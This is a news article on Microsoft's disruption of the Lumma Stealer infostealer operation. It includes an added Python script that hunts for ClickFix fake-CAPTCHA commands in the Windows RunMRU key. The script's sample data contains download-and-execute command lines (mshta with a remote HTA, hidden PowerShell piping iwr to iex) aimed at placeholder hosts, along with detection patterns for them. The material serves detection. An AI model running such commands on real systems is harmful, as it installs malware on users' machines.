Українська правда

Microsoft discovers Lumma malware network that infected 394,000 computers worldwide


Microsoft announced (as reported by CNBC) the disruption of the Lumma Stealer malware operation, which it says infected more than 394,000 Windows computers worldwide between March 16 and May 16, 2025. The action was carried out together with law enforcement agencies in the United States, Europe and Japan.

Lumma Stealer is an infostealer that cybercriminals have used to harvest passwords, banking details, credit card numbers and cryptocurrency wallets. In one campaign it was delivered through phishing emails impersonating popular services such as Booking.com.

Example of a phishing email impersonating Booking.com (image: Microsoft)

Microsoft said it had blocked or taken down approximately 2,300 malicious domains that formed the backbone of Lumma's infrastructure. In addition, more than 1,300 domains were seized by, or transferred to, Microsoft through law enforcement action. The company also disrupted the online marketplaces where the malware was sold. According to Microsoft, criminals have been buying Lumma on underground forums since at least 2022, while its developers have continually expanded its capabilities.

The operation, supported by the US Department of Justice, Europol and the Japan Cybercrime Control Center (JC3), cut the malware off from its victims; 300 domains were redirected to Microsoft-controlled sinkhole servers, where traffic from infected machines is monitored so that victims can be identified and protected.

Heat map of where Lumma Stealer spread the most (image: Microsoft)

Lumma Stealer spread through phishing, malicious advertising and fake CAPTCHA pages (so-called ClickFix lures, which trick the user into pasting a command into the Windows Run dialog). Microsoft said the operators often used Lumma against online gaming communities and educational institutions. Several other cybersecurity companies noted that the malware was also used in attacks on manufacturing, logistics, healthcare and other critical infrastructure sectors.
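Of the three vectors named above, the fake-CAPTCHA one leaves a distinctive host artifact: whatever the victim pastes into the Run dialog is recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and ClickFix commands typically invoke mshta or hidden PowerShell and often carry a "I am not a robot" decoy string. The following Python script is an added example, not Microsoft's detection logic and not code from the original article; the regex heuristics are the editor's own, and the RunMRU entries it scans by default are constructed sample data (the live registry read only works on Windows).

```python
import re

# Heuristics for ClickFix-style "fake CAPTCHA" commands. These are an
# illustrative selection written for this example, not a vendor signature set.
PATTERNS = [
    (re.compile(r"\bmshta(?:\.exe)?\b[^\n]*?(?:https?:|\\\\)", re.I),
     "mshta launching remote HTA"),
    (re.compile(r"\bpowershell(?:\.exe)?\b[^\n]*?"
                r"(?:-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s|-nop\b)", re.I),
     "hidden/encoded PowerShell"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget)\b[^\n]*?\|\s*(?:iex|invoke-expression)\b", re.I),
     "download piped to Invoke-Expression"),
    (re.compile(r"\b(?:iex|invoke-expression)\b\s*\(", re.I),
     "Invoke-Expression on dynamic content"),
    (re.compile(r"\bcmd(?:\.exe)?\b\s*/c\b[^\n]*?\b(?:curl|certutil|bitsadmin)\b", re.I),
     "cmd /c with built-in downloader"),
    (re.compile(r"(?:i am not a robot|recaptcha|verification id|ray id)", re.I),
     "CAPTCHA-themed decoy text appended to the command"),
]

# Constructed sample of a RunMRU key (hostnames are placeholders, not real IOCs).
# Real values end with a literal "\1" marker, and MRUList orders the slots,
# most recently used first.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mshta https://verify-example.invalid/captcha.hta "
         "# I am not a robot - reCAPTCHA Verification ID: 8421\\1",
    "c": "powershell -w hidden -c \"iwr https://cdn-example.invalid/a.txt | iex\"\\1",
}


def strip_mru_suffix(value: str) -> str:
    """Remove the trailing '\\1' marker that Explorer appends to RunMRU values."""
    return value[:-2] if value.endswith("\\1") else value


def classify(command: str) -> list[str]:
    """Return the labels of every heuristic the command line triggers."""
    return [label for rx, label in PATTERNS if rx.search(command)]


def scan_runmru(entries: dict[str, str]) -> list[dict]:
    """Walk the RunMRU slots in MRU order and report suspicious commands."""
    order = entries.get("MRUList", "")
    # Slots not listed in MRUList (a stale key) are still checked, after the ordered ones.
    extra = sorted(k for k in entries if len(k) == 1 and k not in order)
    hits = []
    for slot in list(order) + extra:
        if slot not in entries:
            continue
        cmd = strip_mru_suffix(entries[slot])
        reasons = classify(cmd)
        if reasons:
            hits.append({"slot": slot, "command": cmd, "reasons": reasons})
    return hits


def read_runmru_windows() -> dict[str, str]:
    """Read the current user's live RunMRU key on Windows; returns {} elsewhere."""
    try:
        import winreg
    except ImportError:
        return {}
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values: dict[str, str] = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:  # no more values
                    break
                values[name] = str(data)
                index += 1
    except OSError:  # key absent (user never used Win+R)
        pass
    return values


if __name__ == "__main__":
    live = read_runmru_windows()
    for hit in scan_runmru(live or SAMPLE_RUNMRU):
        print(f"[slot {hit['slot']}] {hit['command']}")
        print("    -> " + ", ".join(hit["reasons"]))
```

On a real host the same key can be dumped with `Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"` in PowerShell; a RunMRU slot is per user, so an enterprise hunt should collect it for every profile, and a hit should be corroborated with PowerShell script-block logs or process-creation events (mshta.exe or powershell.exe spawned by explorer.exe) before treating the machine as compromised.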

Microsoft added that Lumma's main developer is based in Russia and operates under the online alias "Shamel." Shamel sells Lumma as a service at several subscription tiers, advertised via Telegram and other Russian-language chat rooms.
